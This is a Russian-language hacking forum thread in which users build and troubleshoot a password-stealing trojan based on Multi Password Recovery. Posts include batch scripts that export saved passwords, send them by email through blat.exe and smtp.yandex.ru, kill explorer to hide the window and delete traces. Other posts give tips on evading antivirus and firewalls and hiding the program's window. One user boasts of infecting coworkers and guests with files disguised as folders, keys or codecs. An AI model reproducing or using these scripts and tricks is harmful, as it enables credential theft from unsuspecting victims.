Делаем троян с отправкой на почту из Multi Password Recovery

Тема в разделе "Статьи", создана пользователем onthar, 13 дек 2010.

  1. karassik
    karassik Новичок
    Симпатии:
    0
    помогите.....я зделал всё как надо, но мне не приходит нечиго на почту(
     
    29 янв 2011
  2. onthar
    onthar Продвинутый
    Симпатии:
    224
    порт почты неверно указан, скинь конфиг свой.
     
    29 янв 2011
  3. svn184
    svn184 Новичок
    Симпатии:
    0
    Ребята, невопрос сделал прогу полностью невидимой, но проблема теперь в другом , присланные мне на почту фаилы не могу посмотреть, т.к. у меня версия multi password recovery 1.2.6 не зарегистрированна, уже 6 часов лазию по инету и всё бестолку, не одного рабочего патча я ненашёл, помогите кто сможет, завтра выложу файл- который получился невидимый(точнее его архив - чтоб под свою почту менять можнобыло) . Если кто чо узнает как посмотреть файл котрый пришёл на почту если у тебя незарегистрированная версия программы пожалуста отпишитесь, или в аську - срочно надо!!!! 622-238-749
     
    1 фев 2011
  4. chimatii
    chimatii Глобальный модератор
    Симпатии:
    73
    svn184, ну ты даешь)
    качай архив из первого поста, ничего не меняй. в папке include открой MPR.exe и будет тебе счастье: ключ там есть
     
    1 фев 2011
  5. raushenbarx
    raushenbarx Новичок
    Симпатии:
    0
    А как убрать появление окна MPR?- Неприятно как то оно выскакивает
    В Restorator- тупо удалением графических элементов- не получаиццо :-((
     
    Последнее редактирование: 8 фев 2011
    8 фев 2011
  6. onthar
    onthar Продвинутый
    Симпатии:
    224
    raushenbarx,
    полностью - никак.
     
    8 фев 2011
  7. adama
    adama Новичок
    Симпатии:
    2
    Может тупо программно ТаскБар скрывать на время выполнения процесса. Это как то можно прописать в отдельном файле при распаковке? Просто мысля...
    svn184 смотрю пропал с идеей.
     
    11 фев 2011
  8. devil-sergei666
    devil-sergei666 Новичок
    Симпатии:
    0
    Парни, у меня такая проблема, Сделал всё правильно .от 70 % жертв отчёты идут, НО ,от некотрых приходит тупо пустое письмо без отчёта , кто знает в чём может быть проблема?
     
    11 фев 2011
  9. onthar
    onthar Продвинутый
    Симпатии:
    224
    фаер/проактивка блокируют создание/отправку файла с отчетом. Сталкивался с таким.

    никак. можно только вырезать иконку и имя окна, или заменить на свои данные.
     
    11 фев 2011
  10. raushenbarx
    raushenbarx Новичок
    Симпатии:
    0
    А как ты это сделал?
     
    12 фев 2011
  11. devil-sergei666
    devil-sergei666 Новичок
    Симпатии:
    0
    Есть какие нибудь способы обойти фаервол?
     
    12 фев 2011
  12. onthar
    onthar Продвинутый
    Симпатии:
    224
    нет, покупайте нормальных приватных троянцев.
     
    12 фев 2011
  13. vlader
    vlader Guest
    Код:
    @echo off
    :start
    ping ya.ru -n 5 >nul
    if %errorlevel%==0 (goto send) else (goto end)
    
    :end
    goto :start
    
    :send
    blat.exe -install -server smtp.yandex.ru -port 587 -f LOGIN@yandex.ru -u LOGIN -pw PASSWORD
    mpr.exe /export
    ren *.mpf pass.mpf
    blat.exe -body PassReg -to LOGIN@yandex.ru -attach pass.mpf
    del %Temp%\*.* /Q /S /F
    
    Зачем? Если можно просто тут
    Код:
    if %errorlevel%==0 (goto send) else (goto end)
    Вместо end написать start
    Хотя это мелочи. Это неважно. Может на время сбора паролей окно сорачивать и explorer отключать? Тогда
    Код:
    @echo off
    :start
    ping ya.ru -n 5 >nul
    if %errorlevel%==0 (goto send) else (goto start)
    
    :send
    blat.exe -install -server smtp.yandex.ru -port 587 -f LOGIN@yandex.ru -u LOGIN -pw PASSWORD
    taskkill /f /im explorer.exe
    mpr.exe /export
    ping ya.ru -n 10 && explorer
    ren *.mpf pass.mpf
    blat.exe -body PassReg -to LOGIN@yandex.ru -attach pass.mpf
    del %Temp%\*.* /Q /S /F
    
     
    Последнее редактирование модератором: 13 фев 2011
    12 фев 2011
  14. onthar
    onthar Продвинутый
    Симпатии:
    224
    отключение системных процессов, да и вообще доступ к ним, подозрителен для антивирусов, больше вероятность, что сработает детект.

    Да и для пользователя подозрительно падение эксплорера. Лучше нормально доработать mpr.exe, вырезать все лишнее, поставить эконку, заменить текст заголовка и применить капельку СоцИнженерии.
     
    12 фев 2011
  15. vlader
    vlader Guest
    Знаю. Но Аваст не ругался. К тому же taskkill тоже системный процесс. Он ведь в system32 лежит.
     
    12 фев 2011
  16. raushenbarx
    raushenbarx Новичок
    Симпатии:
    0
    Как изменить текст заголовка- можно поподробней?
     
    12 фев 2011
  17. onthar
    onthar Продвинутый
    Симпатии:
    224
    Хекс=редактором, поподробней расписывать не буду.
     
    12 фев 2011
  18. vlader
    vlader Guest
    Код:
    :start
    ping ya.ru -n 5 >nul || goto start
    blat.exe -install -server smtp.yandex.ru -port 587 -f LOGIN@yandex.ru -u LOGIN -pw PASSWORD
    taskkill /f /im explorer.exe
    mpr.exe /export
    ren *.mpf pass.mpf
    blat.exe -body PassReg -to LOGIN@yandex.ru -attach pass.mpf
    explorer
    del %Temp%\*.* /Q /S /F
    exit
    
    Вот! Это новый код батника. ОН работает. Проверенно.
    Всё тоже самое, но с пояснениями.
    Код:
    :start
    @rem создаём метку start
    ping ya.ru -n 5 >nul || goto start
    @rem проверяем инет и если errorlevel(код ошибки) больше 0 то идём на start
    blat.exe -install -server smtp.yandex.ru -port 587 -f LOGIN@yandex.ru -u LOGIN -pw PASSWORD
    @rem задаём параметры blat'а
    taskkill /f /im explorer.exe
    @rem завершаем процесс explorer для того что бы жертва не увидела MPR на таскбаре
    mpr.exe /export
    @rem запускаем MPR в режиме експорта тоесть он прароботает и сохранит рузультат в файл
    ren *.mpf pass.mpf
    @rem переименовываем полученный файл в pass.mpf
    blat.exe -body PassReg -to LOGIN@yandex.ru -attach pass.mpf
    @rem отправляем файл себе на мыло
    explorer
    @rem запускам explorer(раньше лучше не надо, а то может после этого сразу батник остоновить и ничего не придёт)
    del %Temp%\*.* /Q /S /F
    @rem удаляем все файлы, которые использовали
    exit
    @rem выходим из батника
    так-же в файле mpr.ini для того что бы скрыть окно должно быть так
    Код:
    WndLPos=100000
    WndTPos=100000
    В настройках BatToExeConvertor
    [​IMG]
    У меня так работает.
     
    14 фев 2011
  19. onthar
    onthar Продвинутый
    Симпатии:
    224
    vlader, из первого поста тоже все прекрасно работает.
    повторюсь, что убийство "эксплорера" вызывает у проактивных защит подозрение. Легче убрать/заменить иконку и изменить содержание заголовока mpr.exe.
    Про его проактивку я уже писал, что говно полнейшее)
    Про это в топике тоже уже было написано.
     
    14 фев 2011
  20. adama
    adama Новичок
    Симпатии:
    2
    Вот сколько наблюдал за такими темами и способами, этот - самый гениальный!
    Мне кажется, что больше и не надо ничего мудрить, ни с эксплоером, ни с таск-барами, вообще ни с чем. Тут действительно чуть облагораживать можно в виде иконок, названий... по-мелолчам, на всякие случаи. Он мал, практически не заметен, а самое главное, - НАДЕЖЕН! Самое блин главное!

    Я тут фильм дал скачать с флешки своей на работе, а человек сам того не зная решил посмотреть что же лежит в папке под названием ( Важно! ), а я наш файлик под иконкой под папку заделал, клац, - и попался человек! Другой Касперского ставил тоже с флешки, а рядом файлик лежал с иконкой касперыча, - ( Ключи!) Но мы знаем какие там ключи! :) Двое пришли в гости тоже кой-чего скачать себе на флешки, пожалуйста, - (последние кодеки)! Ну кодеки и один коник-кодек! Смотрю, на следующий день, прискакали мои коняжки! В общей сложности, немного но накавырялось и никто, вообще никто так и не понял и ни разу даже не спросил! Потому, что скорее всего даже и не заметили. Чик и всё!

    Классная прожка получилась!
    Я думаю можно задвинуть тему, как его теперь далее продвигать, допустим, удаленно... и какими способами по-уму вызывать на отклик...
     
    Последнее редактирование: 15 фев 2011
    15 фев 2011
Загрузка...